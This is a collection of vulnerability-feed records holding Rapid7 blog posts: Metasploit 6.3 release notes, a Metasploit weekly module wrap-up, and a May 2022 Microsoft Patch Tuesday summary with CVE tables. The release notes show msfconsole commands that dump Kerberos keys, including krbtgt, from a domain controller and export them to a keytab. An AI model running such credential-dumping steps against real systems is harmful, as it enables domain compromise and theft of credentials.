This can be used in Wireshark to automatically decrypt KRB5 network traffic.\n\nFor instance, if Metasploit\u2019s database is configured when running the `secretsdump` module against a domain controller, the extracted Kerberos keys will be persisted in Metasploit\u2019s database:\n \n \n # Secrets dump\n msf6 > use auxiliary/gather/windows_secrets_dump\n msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13\n ... omitted ...\n # Kerberos keys:\n Administrator:aes256-cts-hmac-sha1-96:56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01\n Administrator:aes128-cts-hmac-sha1-96:df990c21c4e8ea502efbbca3aae435ea\n Administrator:des-cbc-md5:ad49d9d92f5da170\n Administrator:des-cbc-crc:ad49d9d92f5da170\n krbtgt:aes256-cts-hmac-sha1-96:e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c\n krbtgt:aes128-cts-hmac-sha1-96:ba87b2bc064673da39f40d37f9daa9da\n krbtgt:des-cbc-md5:3ddf2f627c4cbcdc\n ... omitted ...\n [*] Auxiliary module execution completed\n \n\nThese Kerberos encryption keys can then be exported to a new Keytab file with the `admin/kerberos/keytab` module:\n \n \n # Export to keytab\n msf6 auxiliary(gather/windows_secrets_dump) > use admin/kerberos/keytab\n msf6 auxiliary(admin/kerberos/keytab) > run action=EXPORT keytab_file=./example.keytab\n [+] keytab saved to ./example.keytab\n Keytab entries\n ==============\n \n kvno type principal hash date\n ---- ---- --------- ---- ----\n 1 1 (DES_CBC_CRC) WIN11-DC3$@adf3.local 3e5d83fe4594f261 1970-01-01 01:00:00 +0100\n 1 17 (AES128) ADF3\\DC3$@adf3.local 967ccd1ffb9bff7900464b6ea383ee5b 1970-01-01 01:00:00 +0100\n 1 3 (DES_CBC_MD5) ADF3\\DC3$@adf3.local 62336164643537303830373630643133 1970-01-01 01:00:00 +0100\n 1 18 (AES256) Administrator@adf3.local 56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01 1970-01-01 01:00:00 +0100\n 1 17 (AES128) Administrator@adf3.local df990c21c4e8ea502efbbca3aae435ea 1970-01-01 01:00:00 
+0100\n 1 3 (DES_CBC_MD5) Administrator@adf3.local ad49d9d92f5da170 1970-01-01 01:00:00 +0100\n 1 1 (DES_CBC_CRC) Administrator@adf3.local ad49d9d92f5da170 1970-01-01 01:00:00 +0100\n 1 18 (AES256) krbtgt@adf3.local e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c 1970-01-01 01:00:00 +0100\n 1 17 (AES128) krbtgt@adf3.local ba87b2bc064673da39f40d37f9daa9da 1970-01-01 01:00:00 +0100\n 1 3 (DES_CBC_MD5) krbtgt@adf3.local 3ddf2f627c4cbcdc 1970-01-01 01:00:00 +0100\n ... omitted ...\n [*] Auxiliary module execution completed\n \n\nOnce the new Keytab file is created, configure Wireshark to use the exported encryption keys in `Edit -> Preferences -> Protocols -> KRB5`, and select `try to decrypt Kerberos blobs`. Now Wireshark will automatically try to decrypt Kerberos blobs \u2014 the blue highlighted lines show Wireshark\u2019s decryption working:\n\n\n\n### Certifried privilege escalation\n\nMetasploit 6.3 adds an auxiliary module that exploits a privilege escalation vulnerability known as Certifried ([CVE-2022\u201326923](<https://attackerkb.com/topics/iigmLeSKp1/cve-2022-26923-aka-certifried?referrer=blog>)) in AD CS. The module will generate a valid certificate impersonating the Domain Controller (DC) computer account, and this certificate is then used to authenticate to the target as the DC account using the PKINIT pre-authentication mechanism. The module will get and cache the TGT for this account along with its NTLM hash. Finally, it requests a TGS impersonating a privileged user (Administrator by default). This TGS can then be used by other modules or external tools.\n\n### Updated `show options` support\n\nPrior to Metasploit 6.3, the `show options` and `show advanced` commands would display a module\u2019s supported options in a single list.\n\nNow module authors can add additional metadata to specify conditions for when options are relevant to the user, such as a particular action or datastore value being set. 
Metasploit will then logically group these options together when presenting them to the user:\n\n\n\n## Get it\n\nExisting Metasploit Framework users can update to the latest release of Metasploit Framework via the `msfupdate` command.\n\nNew users can either download the latest release through our [nightly installers](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>), or if you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest release.\n\nThanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Grant Willcox, Jack Heysel, Jacquie Harris, Jeffrey Martin, Matthew Mathur, Navya Harika Karaka, Shelby Pace, Simon Janusz, Spencer McIntyre, and Zach Goldman.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T14:00:00", "type": "rapid7blog", "title": "Metasploit Framework 6.3 Released", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 
10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2023-01-30T14:00:00", "id": "RAPID7BLOG:A8814FA7F7133FA1EBD7461A005D72A1", "href": "https://blog.rapid7.com/2023/01/30/metasploit-framework-6-3-released/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-09-13T15:56:19", "description": "## ICPR Certificate Management\n\n\n\nThis week Metasploit has a new ICPR Certificate Management module from [Oliver Lyak](<https://github.com/ly4k>) and our very own [Spencer McIntyre](<https://github.com/zeroSteiner>), which can be utilized for issuing certificates via Active Directory Certificate Services. The ability to issue certificates is useful in a few contexts, including persistence, [ESC1](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>), and as a primitive necessary for exploiting [CVE-2022-26923](<https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html>). The resulting PFX certificate file is stored to loot and is encrypted using a blank password.\n\n## ManageEngine ADAudit Plus and DataSecurity Plus Xnode enum\n\nAnother addition, thanks to [Erik Wynter](<https://github.com/ErikWynter>) and [Sahil Dhar](<https://github.com/sahildhar>), brings two new `auxiliary/gather` modules and docs that take advantage of default Xnode credentials ([CVE-2020\u201311532](<https://attackerkb.com/topics/2f3mZcIQlN/cve-2020-11532>)) in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server (Xnode). Because both modules rely on the same code to interact with Xnode, this change also adds a mixin at `lib/msf/core/auxiliary/manageengine_xnode` that is leveraged by both modules (plus by a third module that will be part of a separate PR). Both modules also come with configuration files to determine what data will be enumerated from Xnode. 
The [PR](<https://github.com/rapid7/metasploit-framework/pull/16725>) contains even more information on the vulnerable systems and extensive notes!\n\n## New module content (5)\n\n * [ICPR Certificate Management](<https://github.com/rapid7/metasploit-framework/pull/16939>) by [Oliver Lyak](<https://github.com/ly4k>) and [Spencer McIntyre](<https://github.com/zeroSteiner>) \\- This adds a module for issuing certificates via Active Directory Certificate Services, which is useful in a few contexts including persistence and for some specific exploits. The resulting PFX certificate file is stored to the loot and is encrypted using a blank password.\n\n * [ManageEngine ADAudit Plus Xnode Enumeration](<https://github.com/rapid7/metasploit-framework/pull/16725>) by [Erik Wynter](<https://github.com/ErikWynter>) and [Sahil Dhar](<https://github.com/sahildhar>), which exploits [CVE-2020-11532](<https://attackerkb.com/topics/2f3mZcIQlN/cve-2020-11532?referrer=blog>) \\- Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, aka CVE-2020\u201311532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.\n\n * [ManageEngine DataSecurity Plus Xnode Enumeration](<https://github.com/rapid7/metasploit-framework/pull/16725>) by [Erik Wynter](<https://github.com/ErikWynter>) and [Sahil Dhar](<https://github.com/sahildhar>), which exploits [CVE-2020-11532](<https://attackerkb.com/topics/2f3mZcIQlN/cve-2020-11532?referrer=blog>) \\- Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, a.k.a CVE-2020\u201311532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. 
Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.\n\n * [Zyxel Firewall SUID Binary Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/16786>) by [jbaines-r7](<https://github.com/jbaines-r7>), which exploits [CVE-2022-30526](<https://attackerkb.com/topics/q8X8Km59iU/cve-2022-30526?referrer=blog>) \\- This adds an LPE exploit for Zyxel Firewalls that can allow a user to escalate themselves to root. The vulnerability is identified as CVE-2022-30526 and is due to a suid binary that allows any user to copy files with root permissions.\n\n * [CVE-2022-30190 AKA Follina](<https://github.com/rapid7/metasploit-framework/pull/16734>) by [bwatters-r7](<https://github.com/bwatters-r7>) \\- This updates the exploit for CVE-2022-30190 (A.K.A Follina) to support generating RTF exploit documents. RTF documents are helpful for not only being another exploit vector, but they will trigger the payload execution when viewed by Explorer's preview tab without needing user interaction to enable editing functionality.\n\n## Enhancements and features (4)\n\n * [#16746](<https://github.com/rapid7/metasploit-framework/pull/16746>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates the MSSQL login scanner to catch exceptions and continue running.\n\n * [#16900](<https://github.com/rapid7/metasploit-framework/pull/16900>) from [bcoles](<https://github.com/bcoles>) \\- This adds a new `#kill_process` method that supports shell, PowerShell, and Meterpreter sessions on different platforms.\n\n * [#16903](<https://github.com/rapid7/metasploit-framework/pull/16903>) from [bcoles](<https://github.com/bcoles>) \\- This cleans up the enum_shares post modules and adds support for shell sessions.\n\n * [#16959](<https://github.com/rapid7/metasploit-framework/pull/16959>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The `time` command has been updated with the `--cpu` and `--memory` 
profiler options to allow users to get memory and CPU usage profiles when running a command inside `msfconsole`.\n\n## Bugs fixed (5)\n\n * [#16750](<https://github.com/rapid7/metasploit-framework/pull/16750>) from [bojanisc](<https://github.com/bojanisc>) \\- This updates the `exploit/multi/http/jenkins_script_console` module to use the decoder from the `java.util.Base64` class in place of the now-deprecated decoder from the `sun.misc.BASE64Decoder` class, enabling exploitation of newer Jenkins versions.\n\n * [#16869](<https://github.com/rapid7/metasploit-framework/pull/16869>) from [bcoles](<https://github.com/bcoles>) \\- This fixes an issue in the `file_remote_digestmd5()` and `file_remote_digestsha1()` methods where `read_file()` would return an error message instead of the remote file contents. Additionally, the `file_remote_digest*` methods now support more session types, and they have a new `util` option that allows the user to perform the hashing on the remote host instead of downloading the remote file and performing the hashing locally.\n\n * [#16918](<https://github.com/rapid7/metasploit-framework/pull/16918>) from [rbowes-r7](<https://github.com/rbowes-r7>) \\- A bug has been fixed in the module for CVE-2022-30333 whereby if the server responded with a 200 OK response, the module would keep trying to trigger the payload. 
This would lead to multiple sessions being returned when only one was desired.\n\n * [#16920](<https://github.com/rapid7/metasploit-framework/pull/16920>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A typo has been fixed in _msfvenom that prevented ZSH autocompletion from working when using the `--arch` argument with `msfvenom`.\n\n * [#16955](<https://github.com/rapid7/metasploit-framework/pull/16955>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This fixes an issue in the LDAP query module that would cause issues if the user queried for a field that was populated with binary data.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.2.14...6.2.15][prs-landed]\n * [Full diff 6.2.14...6.2.15][diff]\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo][repo](master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers][nightly] or the\n\n[binary installers][binary](which also include the commercial edition). 
\n[binary]: <https://www.rapid7.com/products/metasploit/download.jsp> \n[diff]: <https://github.com/rapid7/metasploit-framework/compare/6.2.14...6.2.15> \n[prs-landed]: [https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:"2022-08-25T17%3A06%3A18%2B01%3A00..2022-09-01T12%3A53%3A23-04%3A00"](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-08-25T17%3A06%3A18%2B01%3A00..2022-09-01T12%3A53%3A23-04%3A00%22>) \n[nightly]: <https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers> \n[repo]: <https://github.com/rapid7/metasploit-framework>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-02T19:39:21", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11532", "CVE-2022-26923", "CVE-2022-30190", "CVE-2022-30333", "CVE-2022-30526"], "modified": "2022-09-02T19:39:21", "id": "RAPID7BLOG:ADAE3CACA7F41A02C12F44F4616369FF", "href": "https://blog.rapid7.com/2022/09/02/metasploit-weekly-wrap-up-174/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2022-05-17T23:31:00", "description": "\n\nThis month is par for the course in terms of both number and severity of vulnerabilities being patched by Microsoft. That means there\u2019s plenty of work to be done by system and network administrators, as usual. \n\nThere is one 0-day this month: [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26925>), a Spoofing vulnerability in the Windows Local Security Authority (LSA) subsystem, which allows attackers able to perform a man-in-the-middle attack to force domain controllers to authenticate to the attacker using NTLM authentication. This is very bad news when used in conjunction with an [NTLM relay attack](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>), potentially leading to remote code execution (RCE). This bug affects all supported versions of Windows, but Domain Controllers should be patched on a priority basis before updating other servers.\n\nTwo other CVEs were also publicly disclosed before today\u2019s releases, though they have not yet been seen exploited in the wild. [CVE-2022-22713](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22713>) is a denial-of-service vulnerability that affects Hyper-V servers running relatively recent versions of Windows (20H2 and later). [CVE-2022-29972](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29972>) is a Critical RCE that affects the Amazon Redshift ODBC driver used by Microsoft\u2019s Self-hosted Integration Runtime (a client agent that enables on-premises data sources to exchange data with cloud services such as Azure Data Factory and Azure Synapse Pipelines). 
This vulnerability also prompted Microsoft to publish their first guidance-based advisory of the year, ADV220001, indicating their plans to strengthen tenant isolation in their cloud services without actually providing any specific details or actions to be taken by customers.\n\nAll told, 74 CVEs were fixed this month, the vast majority of which affect functionality within the Windows operating system. Other notable vulnerabilities include [CVE-2022-21972](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21972>) and [CVE-2022-23270](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-23270>), critical RCEs in the Point-to-Point Tunneling Protocol. Exploitation requires attackers to win a race condition, which increases the complexity, but if you have any RAS servers in your environment, patch sooner rather than later.\n\n[CVE-2022-26937](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26937>) carries a CVSSv3 score of 9.8 and affects services using the Windows Network File System (NFS). This can be mitigated by disabling NFSV2 and NFSV3 on the server; however, this may cause compatibility issues, and upgrading is highly recommended.\n\n[CVE-2022-22017](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22017>) is yet another client-side Remote Desktop Protocol (RDP) vulnerability. While not as worrisome as when an RCE affects RDP servers, if a user can be enticed to connect to a malicious RDP server via social engineering tactics, an attacker will gain RCE on their system.\n\nSharepoint Server administrators should be aware of [CVE-2022-29108](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29108>), a post-authentication RCE fixed today. 
Exchange admins have [CVE-2022-21978](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21978>) to worry about, which could allow an attacker with elevated privileges on an Exchange server to gain the rights of a Domain Administrator.\n\nA host of Lightweight Directory Access Protocol (LDAP) vulnerabilities were also addressed this month, including [CVE-2022-22012](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22012>) and [CVE-2022-29130](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29130>) \u2013 both RCEs that, thankfully, are only exploitable if the MaxReceiveBuffer LDAP policy is set to a value higher than the default value.\n\nAlthough there are no browser vulnerabilities this month, two RCEs affecting Excel ([CVE-2022-29109](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29109>) and [CVE-2022-29110](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29110>)) and one Security Feature Bypass affecting Office ([CVE-2022-29107](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29107>)) mean there is still some endpoint application patching to do.\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Azure vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-29972](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29972>) | Insight Software: CVE-2022-29972 Magnitude Simba Amazon Redshift ODBC Driver | No | Yes | N/A | Yes \n \n### Developer Tools vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-29148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29148>) | Visual Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30129>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-23267](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23267>) | .NET and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-29117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29117>) | .NET and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-29145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29145>) | .NET and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-30130](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30130>) | .NET Framework Denial of Service Vulnerability | No | No | 3.3 | No \n \n### ESU Windows vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-26935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26935>) | Windows WLAN AutoConfig Service Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29121](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29121>) | Windows WLAN AutoConfig Service Denial of Service Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-26936](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26936>) | Windows Server Service Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-22015](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22015>) | Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29103>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-29132](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29132>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26937](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26937>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-26925](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26925>) | Windows LSA Spoofing Vulnerability | Yes | Yes | 8.1 | Yes \n[CVE-2022-22012](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22012>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-29130](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29130>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 9.8 | Yes 
\n[CVE-2022-22013](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22013>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2022-22014](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22014>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2022-29128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29128>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29129>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29137](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29137>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2022-29139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29139>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29141](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29141>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2022-26931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26931>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-26934](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26934>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29112>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-22011](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22011>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 5.5 | Yes 
\n[CVE-2022-29115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29115>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26926](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26926>) | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-22019](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22019>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21972](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21972>) | Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-23270](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23270>) | Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-29105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29105>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-29127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29127>) | BitLocker Security Feature Bypass Vulnerability | No | No | 4.2 | Yes \n \n### Exchange Server vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-21978](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21978>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8.2 | Yes \n \n### Microsoft Office vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-29108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29108>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29107>) | Microsoft Office Security Feature Bypass Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-29109](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29109>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-29110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29110>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### Windows vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-26930](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26930>) | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-29125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29125>) | Windows Push Notifications Apps Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-29114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29114>) | Windows Print Spooler Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-29140](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29140>) | Windows Print Spooler Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-29104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29104>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-22016](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22016>) | Windows PlayToManager Elevation 
of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26933](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26933>) | Windows NTFS Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-29131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29131>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29116](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29116>) | Windows Kernel Information Disclosure Vulnerability | No | No | 4.7 | Yes \n[CVE-2022-29133](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29133>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29142>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-29106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29106>) | Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-24466](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24466>) | Windows Hyper-V Security Feature Bypass Vulnerability | No | No | 4.1 | Yes \n[CVE-2022-22713](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22713>) | Windows Hyper-V Denial of Service Vulnerability | No | Yes | 5.6 | Yes \n[CVE-2022-26927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26927>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29102>) | Windows Failover Cluster Information Disclosure Vulnerability | No | No | 5.5 | Yes 